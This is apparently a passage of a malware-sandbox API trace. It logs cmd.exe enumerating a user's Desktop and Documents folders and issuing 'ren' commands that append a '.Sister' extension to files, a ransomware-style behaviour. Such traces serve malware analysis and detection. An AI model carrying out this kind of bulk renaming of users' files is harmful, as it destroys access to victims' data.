lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0303.984] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0303.984] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0303.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d060 [0303.985] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0303.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0303.985] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0303.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c7d2e0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0303.985] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0303.985] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0303.985] GetProcessHeap () returned 0x21ed8c70000 [0303.985] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66fb0 [0303.985] ??_V@YAXPEAX@Z () returned 0x1 [0303.985] ??_V@YAXPEAX@Z () returned 0x1 [0303.986] GetProcessHeap () returned 0x21ed8c70000 [0303.986] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d565e0, Size=0x490) returned 0x21ed8d565e0 [0303.986] GetProcessHeap () returned 0x21ed8c70000 [0303.986] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d565e0) returned 0x490 [0303.986] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0303.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.986] GetFileType (hFile=0x50) returned 0x2 [0303.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.986] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0303.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.987] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0303.992] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.993] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0303.993] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0303.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.993] GetFileType (hFile=0x50) returned 0x2 [0303.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.993] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0303.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.993] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0303.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.994] GetFileType (hFile=0x50) returned 0x2 [0303.994] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.994] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0303.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.994] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d565b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d565b0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0303.996] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0303.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.996] GetFileType (hFile=0x50) returned 0x2 [0303.996] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.996] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0303.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.996] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.005] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.006] GetFileType (hFile=0x50) returned 0x2 [0304.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.006] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.006] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.011] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.012] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.012] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.012] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0304.012] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0304.012] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.012] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.012] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.012] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.012] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.012] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.012] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.012] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.012] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.012] ??_V@YAXPEAX@Z () returned 0x1 [0304.012] GetProcessHeap () returned 0x21ed8c70000 [0304.012] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0304.013] GetProcessHeap () returned 0x21ed8c70000 [0304.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d621d0 [0304.013] GetProcessHeap () returned 0x21ed8c70000 [0304.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d621d0) returned 0x130 [0304.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.013] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0304.013] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0304.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.013] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda11ffc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.017] ??_V@YAXPEAX@Z () returned 0x1 [0304.017] GetProcessHeap () returned 0x21ed8c70000 [0304.017] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62810 [0304.017] GetProcessHeap () returned 0x21ed8c70000 [0304.017] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0304.017] GetProcessHeap () returned 0x21ed8c70000 [0304.017] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d62310 [0304.017] GetProcessHeap () returned 0x21ed8c70000 [0304.017] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62310) returned 0x130 [0304.018] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0304.018] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0304.018] GetProcessHeap () returned 0x21ed8c70000 [0304.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cbe0 [0304.018] GetProcessHeap () returned 0x21ed8c70000 [0304.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d323b0 [0304.018] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.018] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.018] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.018] GetLastError () returned 0x2 [0304.018] GetProcessHeap () returned 0x21ed8c70000 [0304.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9390070 [0304.018] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9390080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.018] SetErrorMode (uMode=0x0) returned 0x0 [0304.018] SetErrorMode (uMode=0x1) returned 0x0 [0304.019] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda11ffc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.019] SetErrorMode (uMode=0x0) returned 0x1 [0304.019] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.019] GetProcessHeap () returned 0x21ed8c70000 [0304.019] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d32140 [0304.019] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.019] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.019] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.019] GetLastError () returned 0x2 [0304.019] ??_V@YAXPEAX@Z () returned 0x1 [0304.019] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0304.019] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0304.019] malloc (_Size=0xffce) returned 0x21eda12ffa0 [0304.019] ??_V@YAXPEAX@Z () returned 0x21eda12ffa0 [0304.019] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.020] GetLastError () returned 0x2 [0304.020] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.020] GetFileType (hFile=0x54) returned 0x2 [0304.020] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.020] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.020] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.021] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.021] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.021] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.021] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.028] longjmp () [0304.028] ??_V@YAXPEAX@Z () returned 0x1 [0304.028] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb85ebb0, ftCreationTime.dwHighDateTime=0x1d592c8, ftLastAccessTime.dwLowDateTime=0xdc91b910, ftLastAccessTime.dwHighDateTime=0x1d5ac26, ftLastWriteTime.dwLowDateTime=0xdc91b910, ftLastWriteTime.dwHighDateTime=0x1d5ac26, nFileSizeHigh=0x0, nFileSizeLow=0x791d, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="34r863GjrxofmdERZ-U.xlsx", cAlternateFileName="")) returned 1 [0304.028] GetProcessHeap () returned 0x21ed8c70000 [0304.028] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d67630, Size=0x9c) returned 0x21ed937ef10 [0304.028] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ef10) returned 0x9c [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56a80 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56a80, Size=0x30) returned 0x21ed8d56a80 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56a80) returned 0x30 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56ac0 [0304.029] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c110 [0304.029] ??_V@YAXPEAX@Z () returned 0x1 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56ac0, Size=0x200) returned 0x21ed8d56ac0 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56ac0) returned 0x200 [0304.029] GetProcessHeap () returned 0x21ed8c70000 [0304.029] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56cd0 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56cd0, Size=0x290) returned 0x21ed8d56cd0 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56cd0) returned 0x290 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56f70 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56f70, Size=0x30) returned 0x21ed8d56f70 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56f70) returned 0x30 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56fb0 [0304.030] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.030] GetProcessHeap () returned 0x21ed8c70000 [0304.030] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c020 [0304.030] ??_V@YAXPEAX@Z () returned 0x1 [0304.030] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.030] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce80 [0304.031] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0304.031] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d060 [0304.031] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0304.031] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdfcb855e, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdfcb855e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7ce80 [0304.031] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0304.031] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.031] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb85ebb0, ftCreationTime.dwHighDateTime=0x1d592c8, ftLastAccessTime.dwLowDateTime=0xdc91b910, ftLastAccessTime.dwHighDateTime=0x1d5ac26, ftLastWriteTime.dwLowDateTime=0xdc91b910, ftLastWriteTime.dwHighDateTime=0x1d5ac26, nFileSizeHigh=0x0, nFileSizeLow=0x791d, dwReserved0=0x4, dwReserved1=0x7, cFileName="34r863GjrxofmdERZ-U.xlsx", cAlternateFileName="34R863~1.XLS")) returned 0x21ed8c7ca60 [0304.032] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0304.032] _wcsnicmp (_String1="34R863~1.XLS", _String2="34r863GjrxofmdERZ-U.xlsx", _MaxCount=0x18) returned 23 [0304.032] malloc (_Size=0x1ff9c) returned 0x21eda13ff80 [0304.033] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.034] GetProcessHeap () returned 0x21ed8c70000 [0304.034] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8790 [0304.034] ??_V@YAXPEAX@Z () returned 0x1 [0304.034] ??_V@YAXPEAX@Z () returned 0x1 [0304.034] GetProcessHeap () returned 0x21ed8c70000 [0304.034] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56fb0, Size=0x1f8) returned 0x21ed8d56fb0 [0304.035] GetProcessHeap () returned 0x21ed8c70000 [0304.035] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56fb0) returned 0x1f8 [0304.035] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.035] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.035] GetFileType (hFile=0x50) returned 0x2 [0304.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.035] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.035] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.035] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.042] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.042] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.042] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.042] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.042] GetFileType (hFile=0x50) returned 0x2 [0304.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.043] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.043] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.043] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.043] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.044] GetFileType (hFile=0x50) returned 0x2 [0304.044] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.044] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.044] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d56a90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d56a90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.045] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"34r863GjrxofmdERZ-U.xlsx\" \"34r863GjrxofmdERZ-U.xlsx.Sister\" ") returned 62 [0304.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.045] GetFileType (hFile=0x50) returned 0x2 [0304.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.045] 